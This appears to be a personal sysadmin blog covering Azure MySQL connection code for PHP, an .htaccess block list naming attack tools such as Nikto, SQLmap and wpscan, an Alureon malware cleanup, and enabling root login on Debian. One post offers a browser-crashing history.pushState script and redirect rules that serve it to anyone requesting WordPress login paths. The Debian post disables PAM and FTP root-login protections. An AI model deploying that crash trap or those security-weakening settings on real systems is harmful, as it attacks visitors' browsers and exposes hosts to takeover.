27 February 2017

Azure and MySql in App for PHP connections


Microsoft Azure will provide an instance of MySql with a web application without the need to use ClearDB nor a dedicated MySql server. It's one database instance that is not really meant for high production needs.

This is great for using it with Joomla or WordPress. It's also good for developing or deploying PHP-based applications that utilize MySql.

The issue is with setting your PHP application to connect to the database. You do not create a database when using this option, you use the database that is provided and you have to connect to that database.

Here is some code to establish that database connection:

<?php

// Azure MySql Connection Strings

$connectstr_dbhost = '';
$connectstr_dbname = '';
$connectstr_dbusername = '';
$connectstr_dbpassword = '';

foreach ($_SERVER as $key => $value) {
    if (strpos($key, "MYSQLCONNSTR_localdb") !== 0) {
        continue;
    }
   
    $connectstr_dbhost = preg_replace("/^.*Data Source=(.+?);.*$/", "\\1", $value);
    $connectstr_dbname = preg_replace("/^.*Database=(.+?);.*$/", "\\1", $value);
    $connectstr_dbusername = preg_replace("/^.*User Id=(.+?);.*$/", "\\1", $value);
    $connectstr_dbpassword = preg_replace("/^.*Password=(.+?)$/", "\\1", $value);
}

// DB connection info
$host = $connectstr_dbhost;
$user = $connectstr_dbusername;
$pwd = $connectstr_dbpassword;
$db = $connectstr_dbname;

....

?>

If you are configuring WordPress, you would setup like this:

define('DB_NAME', $connectstr_dbname);
define('DB_USER', $connectstr_dbusername);
define('DB_PASSWORD', $connectstr_dbpassword);
define('DB_HOST', $connectstr_dbhost);


You run the first part of the code to define the connection strings for the db_host, database, username, and password. You then use those variables to assign them to the variables of your PHP code, or use them directly.

You can alter this to define the variables with the names that your PHP code uses and use them in the for foreach statement, eliminating the 'DB Connection' section of this code.


16 February 2017

Firefox 40.1 and WordPress attacks


There are many attempts to brute force the WordPress login page against websites that are not running WordPress.

Looking at an Apache access log, there seem to be many of these entries:

187.108.232.211 - - [15/Feb/2017:10:12:44 -0700] "GET /wp-login.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
187.108.232.211 - - [15/Feb/2017:10:12:44 -0700] "GET / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"


All of these probes to find the WordPress login page share the same thing in common: they all indicate Firefox 40.1 as the User Agent.

This makes them an easy target for blocking in an .htaccess file.

Here is an example of an .htaccess file to block many of these tools and robots:


## No directory listings
IndexIgnore *

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
Options -Indexes

## Mod_rewrite in use.
RewriteEngine On
RewriteBase /


## Block Hacking Tools and Miscreant bots by User-Agent
SetEnvIfNoCase User-Agent "^-?$" scum
# wp-login User-Agent
SetEnvIfNoCase User-Agent "Firefox/40.1" tool
# ZED User-Agent (39.0) and others

# All versions of Firefox prior to 40.0 are blocked
SetEnvIfNoCase User-Agent Firefox\/[1-3]?[0-9]\.[0-9] tool
# BurpSuite spider User-Agent
SetEnvIfNoCase User-Agent "Trident/5.0" tool
SetEnvIfNoCase User-Agent "Arachni" tool
# Ruby-based web scraper
SetEnvIfNoCase User-Agent "Mechanize" tool
SetEnvIfNoCase User-Agent "Nikto" tool
SetEnvIfNoCase User-Agent "scrapy-redis" tool
SetEnvIfNoCase User-Agent "SQLmap" tool
SetEnvIfNoCase User-Agent "Vega" tool
SetEnvIfNoCase User-Agent "Wget" tool
SetEnvIfNoCase User-Agent "wpscan" tool

SetEnvIfNoCase User-Agent "360Spider" scum
SetEnvIfNoCase User-Agent "AhrefsBot" scum
SetEnvIfNoCase User-Agent "ADmantX" scum
SetEnvIfNoCase User-Agent "Blexbot" scum
SetEnvIfNoCase User-Agent "Buzzbot" scum
SetEnvIfNoCase User-Agent "CRAZYWEBCRAWLER" scum
SetEnvIfNoCase User-Agent "DomainCrawler" scum
SetEnvIfNoCase User-Agent "Ezooms" scum
SetEnvIfNoCase User-Agent "GetIntent" scum
SetEnvIfNoCase User-Agent "GrapeshotCrawler" scum
SetEnvIfNoCase User-Agent "ias_crawler" scum
SetEnvIfNoCase User-Agent "James Bot" scum
SetEnvIfNoCase User-Agent "linkdexbot" scum
SetEnvIfNoCase User-Agent "ltx71" scum
SetEnvIfNoCase User-Agent "MaxPointCrawler" scum
SetEnvIfNoCase User-Agent "MJ12bot" scum
SetEnvIfNoCase User-Agent "proximic" scum
SetEnvIfNoCase User-Agent "Qwantify" scum
SetEnvIfNoCase User-Agent "RU_Bot" scum
SetEnvIfNoCase User-Agent "SEOkicks" scum
SetEnvIfNoCase User-Agent "SemrushBot" scum
SetEnvIfNoCase User-Agent "seoscanner" scum
SetEnvIfNoCase User-Agent "SiteExplorer" scum
SetEnvIfNoCase User-Agent "SISTRIX" scum
SetEnvIfNoCase User-Agent "SurdotlyBot" scum
SetEnvIfNoCase User-Agent "TestiTest1" scum
SetEnvIfNoCase User-Agent "UptimeRobot" scum
SetEnvIfNoCase User-Agent "XoviBot" scum
SetEnvIfNoCase User-Agent "YFF35" scum

Deny from env=tool
Deny from env=scum
## End - Hacking and Miscreant block



Update 9 Mar 2017:
Further research indicates that these machines are all part of a botnet and that is why they all share the same characteristics. Firefox 40.1 has never existed.
 

27 January 2017

Hackers who hit your website for wp-login.php


Ever noticed hackers trying to break in to WordPress websites, even though your site isn't on the WordPress platform?

Here is a little fun for those hackers who blindly go after WordPress on every website they can find.

This script is from GitHub in reference to the crashsafari.com website. It reloads the page continuously, overwhelming the browser history. It really slows down your computer.

Copy this entire script to  a document and name it secret-login.php. The title on the webpage adds a distraction for when the page loads.


<!DOCTYPE html>
<html>
<head>
<title>Setting up secret login page... Please wait</title>
</head>
<body>

<?PHP
echo "<br />";
echo "Setting up secret login page... Please wait<p />";
echo "<br />";
?>

<script>
  var total = "";
  for( var i = 0; i < 100000; i++ ) {
      total = total + i.toString();
      history.pushState(0,0, total );
  }
</script>
</body>
</html>


Save this php file to the root of your website, or wherever you like.

In your .htaccess file, add the following lines. Make sure you have the RewriteEngine on:

RewriteEngine On

Here is the good part:

# Swat them suckers away
# Usage: RedirectMatch (pattern) (location of script file)
# Shows up as 302 in the access log and is not case-sensitive
RedirectMatch (?i)wp-(login\.php|admin|content|includes) http://example.com/secret-login.php
RedirectMatch (?i)logo_img\.php http://example.com/secret-login.php
RedirectMatch (?i)xmlrpc\.php http://example.com/secret-login.php
RedirectMatch (?i)admin\.php http://example.com/secret-login.php



The pattern is matched on the the entire page request. So, http://example.com/wp-admin/ will work the same as http://example.com/something/wp-admin/.

The (?i) eliminates case sensitivity in the pattern match. So, WP-LOGIN matches as well as Wp-LOgin or whatever.

The first line matches all wp-login.php, wp-admin, or wp-content requests to your website.

The rest of the lines are more requests from hackers seen in the logs for logo_img.php, xmlrpc.php and admin.php. Add your own file names to the list as you see fit.

They get sent to http://example.com/secret-login.php to suffer the from the above script.


Obviously, don't use the wp-xxxxxx pattern if you are using WordPress.


16 April 2012

Wiping out Alureon from an infected laptop

I was assisting a neighbor in cleaning up her Windows-based laptop from blue-screening and redirecting Google searches. She had a Windows 7 64-bit Home Edition install.

The antivirus software on the laptop had expired and was nakedly vulnerable to becoming infected, which it did.

Most of the problem apps, toolbars and malware were easily cleaned by uninstalling them and running an Rkill/ComboFix/Malwarebytes Anti-Malware session on the laptop. There was a strange file in the HKLM\...WOW64\Run section. Finding that file gave me a good clue as to when the machine had downloaded some of the problem apps. Many of the installed malicious software was all installed on the same day, and that showed on file stamps and the date with the Programs and Apps in the Control Panel.

One of the problem apps was FlipToast. It would not uninstall properly. Instead of Uninstall, I used Change and then selected to delete the application when the Install program came up.

Cleaning up Alureon was a little more problematic. It seemed to have been adding the Sirefef.B trojan to the machine. If I used Microsoft Security Essentials to clean it up, the machine would not start properly and would cause the machine to go back to a restore point, where it was still infected.

After reading the experience of others on blogs and forums, this is how I was able to clean up the machine:

Note -  Don't remove any Restore Points, yet. It may take longer to scan the machine, but you may need them to get back into the machine if something fails.

I had to run some of these utilities in Safe Mode, but am unsure which ones and in what sequence. Some utilities would not work in Safe Mode, so I had to switch back and forth.



So, in Safe Mode:
- Run RKill from Bleeping Computer - http://www.bleepingcomputer.com/download/anti-virus/rkill
-- This utility stops any processes that are related to malware

- Run ComboFix from Bleeping Computer - http://www.bleepingcomputer.com/download/anti-virus/combofix
-- ComboFix is a powerful utility to identify and correct many kinds of malware

- Install and Run Malwarebytes Anti-Malware - http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&subj=dl&tag=button
-- This utility is very effective in identifying and removing toolbars, malware, spyware and other threats.

This cleaned up most of the issues. The next part was needed to get to the "root" of the issue.



Kapersky Labs has some good utilities available for assisting in cleaning up viruses, malware and root kits (including full Rescue CDs for when you need one).

The Utility used to assist in this case was TDSSKiller found here - http://support.kaspersky.com/viruses/utility

TDSS assisted in identifying and removing the root kit that kept causing problems.

Next, I had to run the Microsoft Safety Scanner and do a full scan, which took a couple of hours, but it was worth it. You can get the Safety scanner here: http://www.microsoft.com/security/scanner/en-us/default.aspx

I then manually installed the Microsoft Security Essentials from here: http://www.microsoft.com/download/en/details.aspx?id=5201 and performed a quick scan. All was clear.

To finish, I ran a Windows Update and Checked the C: Volume for errors and checked the fix issues option. Then, I removed all previous Restore Points.

It seemed to have worked, so far.

25 February 2012

Setting up Debian Squeeze, Goodbye Ubuntu


As a computer hobbyist, it is fun to try out various operating systems, including the many various flavors of Linux available to the community.

As a website administrator, setting up a LAMP (Linux-Apache-MySQL-PHP) box for the Joomla CMS (Content Management System) is part of the hobby.

I used to enjoy using Ubuntu as a platform to set all of this up. With Ubuntu 11, they changed the desktop interface to a system named Unity. It's awful!!! It would be fine if all I used was a small-screened tablet, but I use a full-sized desktop computer. The user interface is quite annoying. So, it is time to abandon Ubuntu and move onto a more satisfying distro. It's time to try out Debian, from which Ubuntu is based on.

Well, Debian has some secure features that needed to be modified in order to allow for root login to the Gnome desktop and via ftp. There are a million reasons why this is discouraged and a Google search on the topic will inundate you with a million posts against setting this up.

That's all fine, but it was still something that needed to be configured for whatever reason. So, here are the steps taken to use the root account to log into the Gnome desktop using gdm3 and ProFTP on Debian Squeeze.

To log into the Gnome desktop using gdm3:

1. Edit the /etc/gdm3/daemon.conf file
  - add the line AllowRoot=true to the [security] section
.
.
[security]
AllowRoot=true
.
.


2. Edit the /etc/pam.d/gdm3 file
 - comment out the line that reads auth required pam_succeed_if.so user != root quiet success

The file will look like this:
#%PAM-1.0
auth    requisite       pam_nologin.so
auth    required        pam_env.so readenv=1
auth    required        pam_env.so readenv=1 envfile=/etc/default/locale
#auth   required        pam_succeed_if.so user != root quiet_success
@include common-auth
auth    optional        pam_gnome_keyring.so
@include common-account
session required        pam_limits.so
@include common-session
session optional        pam_gnome_keyring.so auto_start
@include common-password



To log into ProFTP as root:

1. Edit the /etc/ftpusers file
 - comment out the line that says root

.
.
#root
.
.


2. Edit the /etc/proftpd/proftpd.conf file
- add the line RootLogin on to the file (can be placed at the end of the file)

.
.
# Put a comment to indicate why you added the line
RootLogin on
.
.


These file modifications allowed me to use the root account to log into the Debian machine for those services. I am posting the steps for those who need to make these modifications and do not wish to wade through pages and pages of opinions and pontifications.

Disclaimer: avoid logging into your machine as root. It is highly discouraged.